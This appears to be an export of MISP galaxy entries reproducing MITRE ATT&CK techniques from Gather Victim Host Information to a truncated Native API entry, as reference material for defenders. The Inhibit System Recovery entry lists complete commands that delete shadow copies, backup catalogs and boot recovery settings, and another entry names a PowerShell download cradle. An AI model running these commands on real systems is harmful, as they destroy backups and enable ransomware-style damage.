Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.[ATT ScanBox] Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).

Internal MISP references

UUID 4acf57da-73c1-4555-a86a-38ea4a8b962d which can be used as unique global reference for Gather Victim Host Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Gather Victim Identity Information

Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about users could also be enumerated via other active means (i.e. Active Scanning) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.[GrimBlog UsernameEnum][Obsidian SSPR Abuse 2023] Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[OPM Leak][Register Deloitte][Register Uber][Detectify Slack Tokens][Forbes GitHub Creds][GitHub truffleHog][GitHub Gitrob][CNET Leaks]

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).

Internal MISP references

UUID aea36489-047e-4c4a-ab26-c51fd3556182 which can be used as unique global reference for Gather Victim Identity Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Gather Victim Network Information

Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[WHOIS][DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).

Internal MISP references

UUID 58776ca9-0c54-487f-afcc-e7e5b661bd54 which can be used as unique global reference for Gather Victim Network Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Gather Victim Org Information

Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak][SEC EDGAR Search] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing or Trusted Relationship).

Internal MISP references

UUID e55d2e4b-07d8-4c22-b543-c187be320578 which can be used as unique global reference for Gather Victim Org Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Group Policy Discovery

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.[TechNet Group Policy Basics][ADSecurity GPO Persistence 2016]

Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.[Microsoft gpresult][Github PowerShell Empire] Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain or Tenant Policy Modification) for their benefit.

Internal MISP references

UUID d97d754d-92d5-4874-bbfe-5aa4d581f2a8 which can be used as unique global reference for Group Policy Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Hardware Additions

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. Replication Through Removable Media), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. Adversary-in-the-Middle), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.[Ossmann Star Feb 2011][Aleks Weapons Nov 2015][Frisk DMA August 2016][McMillan Pwn March 2012]

Internal MISP references

UUID 4557bfb9-b940-49b6-b8be-571979134419 which can be used as unique global reference for Hardware Additions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Hide Artifacts

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.[Sofacy Komplex Trojan][Cybereason OSX Pirrit][MalwareBytes ADS July 2015]

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.[Sophos Ragnar May 2020]

Internal MISP references

UUID f37f0cd5-0446-415f-9309-94e25aa1165d which can be used as unique global reference for Hide Artifacts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Hide Infrastructure

Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,[TA571] masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,[Schema-abuse][Facad1ng][Browser-updates] and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.

C2 networks may include the use of Proxy or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.[sysdig][Orange Residential Proxies]

Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.[mod_rewrite][SocGholish-update] Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., Virtualization/Sandbox Evasion).[TA571][mod_rewrite]

Hiding C2 infrastructure may also be supported by Resource Development activities such as Acquire Infrastructure and Compromise Infrastructure. For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.[StarBlizzard][QR-cofense]

Internal MISP references

UUID a3a2a527-39e7-58b4-a3cc-932eb0cef562 which can be used as unique global reference for Hide Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Hijack Execution Flow

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

Internal MISP references

UUID 1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68 which can be used as unique global reference for Hijack Execution Flow in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Impair Defenses

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.[Emotet shutdown]

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

Internal MISP references

UUID e3be3d76-0a36-4060-8003-3b39c557f728 which can be used as unique global reference for Impair Defenses in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Impersonation

Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via Phishing for Information, Phishing, or Internal Spearphishing) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims.

In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables Financial Theft.

Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as payment, request, or urgent to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.  

Impersonation is typically preceded by reconnaissance techniques such as Gather Victim Identity Information and Gather Victim Org Information as well as acquiring infrastructure such as email domains (i.e. Domains) to substantiate their false identity.[CrowdStrike-BEC]

There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may Compromise Accounts targeting one organization which can then be used to support impersonation against other entities.[VEC]

Internal MISP references

UUID 20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1 which can be used as unique global reference for Impersonation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Implant Internal Image

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.[Rhino Labs Cloud Image Backdoor Technique Sept 2019]

A tool has been developed to facilitate planting backdoors in cloud container images.[Rhino Labs Cloud Backdoor September 2019] If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.[Rhino Labs Cloud Image Backdoor Technique Sept 2019]

Internal MISP references

UUID b4f2b54c-d304-4e05-a813-69bc7e6fd1f3 which can be used as unique global reference for Implant Internal Image in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Indicator Removal

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

Internal MISP references

UUID fa1507f1-c763-4af1-8bd9-a2fb8f7904be which can be used as unique global reference for Indicator Removal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Google Workspace', 'Linux', 'macOS', 'Network', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Indirect Command Execution

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. [VectorSec ForFiles Aug 2017] [Evi1cg Forfiles Nov 2017]

Adversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.

Internal MISP references

UUID 91e79eb9-7f99-4890-8bef-9543d307206d which can be used as unique global reference for Indirect Command Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Ingress Tool Transfer

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.[t1105_lolbas]

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows search-ms protocol handler, to deliver malicious files to victims through remote file searches invoked by User Execution (typically after interacting with Phishing lures).[T1105: Trellix_search-ms]

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.[PTSecurity Cobalt Dec 2016] In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.[Dropbox Malware Sync]

Internal MISP references

UUID 4499ce34-9871-4879-883c-19ddb940f242 which can be used as unique global reference for Ingress Tool Transfer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Inhibit System Recovery

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.[Talos Olympic Destroyer 2018][FireEye WannaCry 2017] This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact.[Talos Olympic Destroyer 2018][FireEye WannaCry 2017] Furthermore, adversaries may disable recovery notifications, then corrupt backups.[disable_notif_synology_ransom]

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

  • vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
  • Windows Management Instrumentation can be used to delete volume shadow copies - wmic shadowcopy delete
  • wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
  • bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
  • REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
  • diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all [Diskshadow] [Crytox Ransomware]

On network devices, adversaries may leverage Disk Wipe to delete backup firmware images and reformat the file system, then System Shutdown/Reboot to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.[ZDNet Ransomware Backups 2020] In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.[Dark Reading Code Spaces Cyber Attack][Rhino Security Labs AWS S3 Ransomware]

Internal MISP references

UUID d207c03b-fbe7-420e-a053-339f4650c043 which can be used as unique global reference for Inhibit System Recovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Input Capture

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture).

Internal MISP references

UUID 5ee96331-a7b7-4c32-a8f1-3fb164078f5f which can be used as unique global reference for Input Capture in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Internal Spearphishing

After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating Impersonation.[Trend Micro - Int SP]

For example, adversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites that mimic login interfaces.

Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.[Int SP - chat apps]

Internal MISP references

UUID 4f4ea659-7653-4bfd-a525-b2af32c5899b which can be used as unique global reference for Internal Spearphishing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Inter-Process Communication

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows Dynamic Data Exchange or Component Object Model. Linux environments support several different IPC mechanisms, two of which being sockets and pipes.[Linux IPC] Higher level execution mediums, such as those of Command and Scripting Interpreters, may also leverage underlying IPC mechanisms. Adversaries may also use Remote Services such as Distributed Component Object Model to facilitate remote IPC execution.[Fireeye Hunting COM June 2019]

Internal MISP references

UUID afa4e2b5-cdd8-4d54-bcdb-acee8b5649e4 which can be used as unique global reference for Inter-Process Communication in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Lateral Tool Transfer

Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol.[Unit42 LockerGoga 2019]

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and ftp. In some cases, adversaries may be able to leverage Web Services such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.[Dropbox Malware Sync]

Internal MISP references

UUID 3dea57fc-3131-408b-a1fd-ff2eea1d858f which can be used as unique global reference for Lateral Tool Transfer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Log Enumeration

Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records (Account Discovery), security or vulnerable software (Software Discovery), or hosts within a compromised network (Remote System Discovery).

Host binaries may be leveraged to collect system logs. Examples include using wevtutil.exe or PowerShell on Windows to access and/or export security event information.[WithSecure Lazarus-NoPineapple Threat Intel Report 2023][Cadet Blizzard emerges as novel threat actor] In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s CollectGuestLogs.exe to collect security logs from cloud hosted infrastructure.[SIM Swapping and Abuse of the Microsoft Azure Serial Console]

Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.

Internal MISP references

UUID 309c7c8b-c366-5762-8611-136971ac4eb4 which can be used as unique global reference for Log Enumeration in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Masquerading

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of Masquerading.[LOLBAS Main Site]

Internal MISP references

UUID a0adacc1-8d2a-4e0b-92c1-3766264df4fd which can be used as unique global reference for Masquerading in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Modify Authentication Process

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts.

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

Internal MISP references

UUID f516ecd7-a6a6-4018-8e58-c007be05bdce which can be used as unique global reference for Modify Authentication Process in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Modify Cloud Compute Infrastructure

An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.[Mandiant M-Trends 2020]

Internal MISP references

UUID 46c78b63-d079-441e-abdd-c16b39d4bab3 which can be used as unique global reference for Modify Cloud Compute Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Modify Registry

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. [Microsoft Reg] Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. [Microsoft Reghide NOV 2006] Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. [TrendMicro POWELIKS AUG 2014] [SpectorOps Hiding Reg Jul 2017]

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. [Microsoft Remote] Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.

Internal MISP references

UUID 0dfeab84-3c42-4b56-9021-70fe5be4092b which can be used as unique global reference for Modify Registry in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Modify System Image

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

Internal MISP references

UUID f435a5ff-78d2-44de-b464-2b5528f94adc which can be used as unique global reference for Modify System Image in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
source MITRE
Related clusters

To see the related clusters, click here.

Multi-Factor Authentication Interception

Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. [Mandiant M Trends 2011]

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). [GCN RSA June 2011]

Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.[Okta Scatter Swine 2022]

Internal MISP references

UUID 600d45ec-cb9c-47b8-ae94-326471ebb007 which can be used as unique global reference for Multi-Factor Authentication Interception in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Multi-Factor Authentication Request Generation

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to Valid Accounts may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).[Obsidian SSPR Abuse 2023]

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”[Russian 2FA Push Annoyance - Cimpanu][MFA Fatigue Attacks - PortSwigger][Suspected Russian Activity Targeting Government and Business Entities Around the Globe]

Internal MISP references

UUID c0f2efd4-bfc8-43da-9859-14446fb8f289 which can be used as unique global reference for Multi-Factor Authentication Request Generation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Multi-Stage Channels

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.

Internal MISP references

UUID e54bdb49-6039-4048-9be6-657a7ff3e071 which can be used as unique global reference for Multi-Stage Channels in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Native API

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.[NT API Windows][Linux Kernel API] These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.[OutFlank System Calls][CyberBit System Calls][MDSec System Calls] For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.[Microsoft CreateProcess][GNU Fork] This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.[Microsoft Win32][LIBC][GLIBC]

